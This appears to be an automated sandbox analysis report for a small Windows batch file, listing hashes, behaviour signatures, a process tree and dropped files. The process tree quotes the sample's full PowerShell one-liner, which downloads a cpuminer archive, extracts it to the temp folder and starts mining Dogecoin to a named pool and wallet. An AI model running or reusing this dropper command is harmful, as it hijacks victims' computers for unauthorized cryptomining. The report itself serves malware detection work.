b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1799s
max time network
1798s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2024, 04:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1868	powershell.exe
9	1868	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3224	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3224	cpuminer-sse2.exe
3224	cpuminer-sse2.exe
3224	cpuminer-sse2.exe
3224	cpuminer-sse2.exe
3224	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1868	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5016 wrote to memory of 1868	5016	cmd.exe	86
PID 5016 wrote to memory of 1868	5016	cmd.exe	86
PID 1868 wrote to memory of 4724	1868	powershell.exe	97
PID 1868 wrote to memory of 4724	1868	powershell.exe	97
PID 4724 wrote to memory of 3224	4724	cmd.exe	99
PID 4724 wrote to memory of 3224	4724	cmd.exe	99

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3224

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gub0sovn.hvu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
166KB

MD5
2516d687ae50e66b019c3397af576af5

SHA1
857a597600a2fb673538d8f610625b327e545811

SHA256
4cb57aa519f094c4d711d5341c1969913e263df95e09448a5c167f8bb574c0da

SHA512
4f471783b839c15c84092bd9c2dec4604e1a234e93c706fe5e1365094bde655b38c78f4f1d7a4ec5d012398f96506051b88956af4483079c7ee88673ba68a23e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
304KB

MD5
96e309448565eec18f7e1f346c50c11c

SHA1
94bf1e00c8f0b7e3c6428155d35b8869098c0330

SHA256
f4f0e545d540c5e5987bfbd8c7b775e7a962de0c97ce17f00a7fa5e3c5e15c21

SHA512
f3b6cb9b557975d0f33e86b9203457fc7b8aa509eac75669bdbbf96c71f5d4cc927e0b00c02d3d5e69aaf62fd7a76e51b8be6c205122855dbf9a9768c5f375b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
160KB

MD5
0fca6aef7efaa50373856f12928567ae

SHA1
c4e04b06368a83ca1c0d214755ed36b323b6cafe

SHA256
03ff73d9adeca2854defa8535c39925a34f3b566c550d043a025dc1d2de61208

SHA512
f82ed4f978ae6ad339b46274c6fea51f7fc9e44752545280ae705c470109d80f5dc1f0d3604e3f6f44c8422b8e721f7983f4316d3fde991d65f051942fe0ed23

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
175KB

MD5
a9abcb70030239504dcb8343988eab3a

SHA1
8e614a20b2afece7db2b91df47894627c347ec93

SHA256
19c66bef5e7d7ed969512d060fa03f8361f715cdace0a15c526ce7d19dc0e6c8

SHA512
fa8b7a044b08f4e9296430cf22586cddcc5b060ea46edd4244cd92dcb275e7f055f1d75a34cd5bf51b9bddbb545e27391cd0cc17d74c5d06824d3af40de1760c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
332KB

MD5
38b501f74a253e6f93d75046c18370a8

SHA1
30586bdd4364a31d4e675fb57c32cb9b0dea24da

SHA256
591595dcbf7834573d57d00a085a1ccd14a896720b025b4d1ea8499b64e48548

SHA512
142bdb61b20930564944207efd35d7eda21f351f1075c66303cc66b43fbc874e5af3a350df80670c8140881f7644aa2b462a66c1f30e5d3f51d7b1f0825ea3b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
155KB

MD5
b4f45da8466987ad49dfed39512f5331

SHA1
1f30a7a9d078bcc2460ee6329a2e8e6741902054

SHA256
3f2933a5359b30fb896b6484ce7dedf30644bb7f13860d3923867976fbb74e26

SHA512
31ea5ddf154e60c3cc42129f2ef216d1ddcdd3829370fd436cb284e06633313b2d594c62c3afbfb18f33bdf716967f0d381e38214355a51cf825bacf0efc412f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
189KB

MD5
cc654098511a0ec843559049b99987c1

SHA1
66b54ce8606675a6e1a8a1b6338fcd08863aff02

SHA256
8a382e4d932572d9f85a9a365373c23135125912260cc61aea3b6a35441c71dd

SHA512
dc7061c916cfd9baa1380f0df4e9d8ba0d95c13c108cadab7215f5c3b7b8d47719651f68ebac07bdb4beb400fb9fc0d445a6cb418ef96c238ea01cd404256a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
101KB

MD5
330cbea42e6424acbfdbd76ec90490b3

SHA1
b055601f4236d02149a1501101f9ce577cb21f1c

SHA256
916956a48debbc88cb84643518e877731d94a235ee1d8dbb99f30df41e227398

SHA512
cadf268946c5d7e339c9edf37cf7503374b5019696f54c08ae64384d340f6671f9c0304a64a1da543d0eaf33ce800e366c9b10f34428ff664f1067efcc4d7780

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
112KB

MD5
afda98b9399da746c1ebf05cd4dbf872

SHA1
ef3ee064927c227f0d41f9e5fba61cc3b0c8533b

SHA256
bb4194758595348b17c44c982bcd4a687d334cdc48aa7b8767c5f9b16335857b

SHA512
7c14fa51ddfa702c3ba2b4b09b3f5bea097ef39a927f51e04245e64b2f39123cd2fa25e6e0b4e39e4f73a1bd54cd90e42523e6fe5394a016a8d2a88b797cdbfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
195KB

MD5
01fd40ae0fe4d8d667bdfdce815c696a

SHA1
cec48ebd1f69e0e21f98c08314ebdd48c455edfe

SHA256
7734984f791c6ded24773ca9772bbc4d030f8323cbd3335fbbaccef15534f246

SHA512
1953d7c3ad52d49225222066502fe2065106622a65e975e1e6c1fa780a153aad061fa2028955795dbde864124c05e437e9b25e22118179b614f41e80dadaa6b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
147KB

MD5
88fabc43f840c966dde3c65f8aa984a9

SHA1
d41b2942b7d3337da1cc5121c5558bcc4de74f6c

SHA256
bff0a45e93a26c117c88f5c852423a1ecb3984ae205e058bfd29715d19aaa8b5

SHA512
d9fd81cb0f90c0edafc06106c3e0a760a9f597e38a22517b6de8dba3bb14d3634d6d18168c197c8a9815096ea7c6498b10c83eb30d4cddf57755acda78ffae16

Download Submit
memory/1868-18-0x0000014D3FC80000-0x0000014D3FC8A000-memory.dmp

Filesize
40KB

Download
memory/1868-56-0x00007FFA0EDC0000-0x00007FFA0F881000-memory.dmp

Filesize
10.8MB

Download
memory/1868-17-0x0000014D3FC90000-0x0000014D3FCA2000-memory.dmp

Filesize
72KB

Download
memory/1868-16-0x0000014D25790000-0x0000014D257A0000-memory.dmp

Filesize
64KB

Download
memory/1868-14-0x0000014D25790000-0x0000014D257A0000-memory.dmp

Filesize
64KB

Download
memory/1868-13-0x00007FFA0EDC0000-0x00007FFA0F881000-memory.dmp

Filesize
10.8MB

Download
memory/1868-12-0x0000014D25790000-0x0000014D257A0000-memory.dmp

Filesize
64KB

Download
memory/1868-11-0x0000014D25790000-0x0000014D257A0000-memory.dmp

Filesize
64KB

Download
memory/1868-10-0x00007FFA0EDC0000-0x00007FFA0F881000-memory.dmp

Filesize
10.8MB

Download
memory/1868-9-0x0000014D3FC00000-0x0000014D3FC22000-memory.dmp

Filesize
136KB

Download
memory/3224-70-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3224-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-71-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3224-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-73-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3224-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-72-0x0000000057090000-0x0000000057128000-memory.dmp

Filesize
608KB

Download
memory/3224-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-109-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-114-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-119-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download